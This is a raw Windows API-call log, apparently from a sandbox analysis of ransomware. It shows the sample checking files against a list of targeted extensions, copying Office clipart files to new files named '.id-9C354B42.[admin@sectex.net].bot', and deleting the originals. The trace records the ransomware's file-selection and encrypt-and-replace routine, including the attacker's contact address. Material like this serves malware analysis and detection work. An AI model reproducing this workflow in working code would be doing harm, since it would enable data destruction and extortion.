	[0169.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63
	[0169.686] lstrlenW (lpString=".doc") returned 4
	[0169.686] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.686] lstrlenW (lpString=".docx") returned 5
	[0169.686] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0169.686] lstrlenW (lpString=".pdf") returned 4
	[0169.687] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.687] lstrlenW (lpString=".xls") returned 4
	[0169.687] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.687] lstrlenW (lpString=".xlsx") returned 5
	[0169.687] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0169.687] lstrlenW (lpString=".ppt") returned 4
	[0169.687] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63
	[0169.687] lstrlenW (lpString=".zip") returned 4
	[0169.687] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.687] lstrlenW (lpString=".rar") returned 4
	[0169.687] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.687] lstrlenW (lpString=".bz2") returned 4
	[0169.687] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.687] lstrlenW (lpString=".7z") returned 3
	[0169.687] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63
	[0169.687] lstrlenW (lpString=".dbf") returned 4
	[0169.687] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63
	[0169.687] lstrlenW (lpString=".1cd") returned 4
	[0169.687] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63
	[0169.687] lstrlenW (lpString=".jpg") returned 4
	[0169.687] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63
	[0169.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63
	[0169.687] lstrlenW (lpString=".doc") returned 4
	[0169.687] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.687] lstrlenW (lpString=".docx") returned 5
	[0169.687] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0169.687] lstrlenW (lpString=".pdf") returned 4
	[0169.687] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.687] lstrlenW (lpString=".xls") returned 4
	[0169.688] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.688] lstrlenW (lpString=".xlsx") returned 5
	[0169.688] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0169.688] lstrlenW (lpString=".ppt") returned 4
	[0169.688] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63
	[0169.688] lstrlenW (lpString=".zip") returned 4
	[0169.688] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.688] lstrlenW (lpString=".rar") returned 4
	[0169.688] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.688] lstrlenW (lpString=".bz2") returned 4
	[0169.688] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.688] lstrlenW (lpString=".7z") returned 3
	[0169.688] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63
	[0169.688] lstrlenW (lpString=".dbf") returned 4
	[0169.688] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63
	[0169.688] lstrlenW (lpString=".1cd") returned 4
	[0169.688] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63
	[0169.688] lstrlenW (lpString=".jpg") returned 4
	[0169.688] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.688] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0169.688] lstrlenW (lpString="J0164153.JPG") returned 12
	[0169.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0164153.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0169.689] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=46484) returned 1
	[0169.689] CloseHandle (hObject=0x17c) returned 1
	[0169.689] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0164153.jpg")) returned 0x20
	[0169.689] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0164153.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0164153.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0169.690] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.690] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0164153.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0169.690] GetLastError () returned 0x0
	[0169.690] ReadFile (in: hFile=0x17c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xb594, lpOverlapped=0x0) returned 1
	[0169.733] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xb5a0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xb5a0, lpOverlapped=0x0) returned 1
	[0169.735] ReadFile (in: hFile=0x17c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.735] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.735] SetEndOfFile (hFile=0x1d8) returned 1
	[0169.735] CloseHandle (hObject=0x1d8) returned 1
	[0169.735] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.735] SetEndOfFile (hFile=0x17c) returned 1
	[0169.738] CloseHandle (hObject=0x17c) returned 1
	[0169.738] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.738] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0164153.jpg")) returned 1
	[0169.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG") returned 63
	[0169.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG") returned 63
	[0169.739] lstrlenW (lpString=".doc") returned 4
	[0169.739] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0169.739] lstrlenW (lpString=".docx") returned 5
	[0169.739] lstrcmpiW (lpString1=".docx", lpString2="3.JPG") returned -1
	[0169.739] lstrlenW (lpString=".pdf") returned 4
	[0169.739] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0169.739] lstrlenW (lpString=".xls") returned 4
	[0169.739] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0169.739] lstrlenW (lpString=".xlsx") returned 5
	[0169.739] lstrcmpiW (lpString1=".xlsx", lpString2="3.JPG") returned -1
	[0169.739] lstrlenW (lpString=".ppt") returned 4
	[0169.739] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0169.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG") returned 63
	[0169.739] lstrlenW (lpString=".zip") returned 4
	[0169.739] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0169.739] lstrlenW (lpString=".rar") returned 4
	[0169.739] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0169.739] lstrlenW (lpString=".bz2") returned 4
	[0169.739] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0169.739] lstrlenW (lpString=".7z") returned 3
	[0169.739] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0169.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG") returned 63
	[0169.739] lstrlenW (lpString=".dbf") returned 4
	[0169.739] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0169.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG") returned 63
	[0169.739] lstrlenW (lpString=".1cd") returned 4
	[0169.739] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0169.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG") returned 63
	[0169.739] lstrlenW (lpString=".jpg") returned 4
	[0169.740] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0169.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG") returned 63
	[0169.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG") returned 63
	[0169.740] lstrlenW (lpString=".doc") returned 4
	[0169.740] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0169.740] lstrlenW (lpString=".docx") returned 5
	[0169.740] lstrcmpiW (lpString1=".docx", lpString2="3.JPG") returned -1
	[0169.740] lstrlenW (lpString=".pdf") returned 4
	[0169.740] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0169.740] lstrlenW (lpString=".xls") returned 4
	[0169.740] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0169.740] lstrlenW (lpString=".xlsx") returned 5
	[0169.740] lstrcmpiW (lpString1=".xlsx", lpString2="3.JPG") returned -1
	[0169.740] lstrlenW (lpString=".ppt") returned 4
	[0169.740] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0169.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG") returned 63
	[0169.740] lstrlenW (lpString=".zip") returned 4
	[0169.740] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0169.740] lstrlenW (lpString=".rar") returned 4
	[0169.740] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0169.740] lstrlenW (lpString=".bz2") returned 4
	[0169.740] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0169.740] lstrlenW (lpString=".7z") returned 3
	[0169.740] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0169.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG") returned 63
	[0169.740] lstrlenW (lpString=".dbf") returned 4
	[0169.740] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0169.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG") returned 63
	[0169.740] lstrlenW (lpString=".1cd") returned 4
	[0169.740] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0169.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG") returned 63
	[0169.740] lstrlenW (lpString=".jpg") returned 4
	[0169.740] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0169.741] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.741] lstrlenW (lpString="J0172035.WMF") returned 12
	[0169.741] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172035.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0169.741] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=7448) returned 1
	[0169.741] CloseHandle (hObject=0x17c) returned 1
	[0169.741] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172035.wmf")) returned 0x20
	[0169.741] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172035.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.742] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172035.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0169.742] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.742] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.742] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172035.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0169.743] GetLastError () returned 0x0
	[0169.743] ReadFile (in: hFile=0x17c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x1d18, lpOverlapped=0x0) returned 1
	[0169.748] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1d20, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1d20, lpOverlapped=0x0) returned 1
	[0169.749] ReadFile (in: hFile=0x17c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.749] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.749] SetEndOfFile (hFile=0x1d8) returned 1
	[0169.749] CloseHandle (hObject=0x1d8) returned 1
	[0169.749] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.749] SetEndOfFile (hFile=0x17c) returned 1
	[0169.751] CloseHandle (hObject=0x17c) returned 1
	[0169.751] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.752] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172035.wmf")) returned 1
	[0169.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF") returned 63
	[0169.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF") returned 63
	[0169.752] lstrlenW (lpString=".doc") returned 4
	[0169.752] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.752] lstrlenW (lpString=".docx") returned 5
	[0169.752] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0169.752] lstrlenW (lpString=".pdf") returned 4
	[0169.752] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.752] lstrlenW (lpString=".xls") returned 4
	[0169.752] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.752] lstrlenW (lpString=".xlsx") returned 5
	[0169.753] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0169.753] lstrlenW (lpString=".ppt") returned 4
	[0169.753] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF") returned 63
	[0169.753] lstrlenW (lpString=".zip") returned 4
	[0169.753] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.753] lstrlenW (lpString=".rar") returned 4
	[0169.753] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.753] lstrlenW (lpString=".bz2") returned 4
	[0169.753] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.753] lstrlenW (lpString=".7z") returned 3
	[0169.753] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF") returned 63
	[0169.753] lstrlenW (lpString=".dbf") returned 4
	[0169.753] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF") returned 63
	[0169.753] lstrlenW (lpString=".1cd") returned 4
	[0169.753] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF") returned 63
	[0169.753] lstrlenW (lpString=".jpg") returned 4
	[0169.753] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF") returned 63
	[0169.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF") returned 63
	[0169.753] lstrlenW (lpString=".doc") returned 4
	[0169.753] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.753] lstrlenW (lpString=".docx") returned 5
	[0169.753] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0169.753] lstrlenW (lpString=".pdf") returned 4
	[0169.753] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.753] lstrlenW (lpString=".xls") returned 4
	[0169.753] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.753] lstrlenW (lpString=".xlsx") returned 5
	[0169.753] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0169.753] lstrlenW (lpString=".ppt") returned 4
	[0169.754] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF") returned 63
	[0169.754] lstrlenW (lpString=".zip") returned 4
	[0169.754] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.754] lstrlenW (lpString=".rar") returned 4
	[0169.754] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.754] lstrlenW (lpString=".bz2") returned 4
	[0169.754] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.754] lstrlenW (lpString=".7z") returned 3
	[0169.754] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF") returned 63
	[0169.754] lstrlenW (lpString=".dbf") returned 4
	[0169.754] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF") returned 63
	[0169.754] lstrlenW (lpString=".1cd") returned 4
	[0169.754] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF") returned 63
	[0169.754] lstrlenW (lpString=".jpg") returned 4
	[0169.754] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.754] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.754] lstrlenW (lpString="J0172067.WMF") returned 12
	[0169.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172067.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0169.824] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=7028) returned 1
	[0169.824] CloseHandle (hObject=0x3f0) returned 1
	[0169.824] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172067.wmf")) returned 0x20
	[0169.895] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172067.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.895] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172067.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0169.896] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.896] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172067.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0169.897] GetLastError () returned 0x0
	[0169.897] ReadFile (in: hFile=0x180, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x1b74, lpOverlapped=0x0) returned 1
	[0169.922] WriteFile (in: hFile=0x124, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1b80, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1b80, lpOverlapped=0x0) returned 1
	[0169.922] ReadFile (in: hFile=0x180, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.922] WriteFile (in: hFile=0x124, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.923] SetEndOfFile (hFile=0x124) returned 1
	[0170.341] CloseHandle (hObject=0x124) returned 1
	[0170.341] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.341] SetEndOfFile (hFile=0x180) returned 1
	[0170.344] CloseHandle (hObject=0x180) returned 1
	[0170.344] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0170.344] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172067.wmf")) returned 1
	[0170.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF") returned 63
	[0170.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF") returned 63
	[0170.345] lstrlenW (lpString=".doc") returned 4
	[0170.345] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0170.345] lstrlenW (lpString=".docx") returned 5
	[0170.345] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0170.345] lstrlenW (lpString=".pdf") returned 4
	[0170.345] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
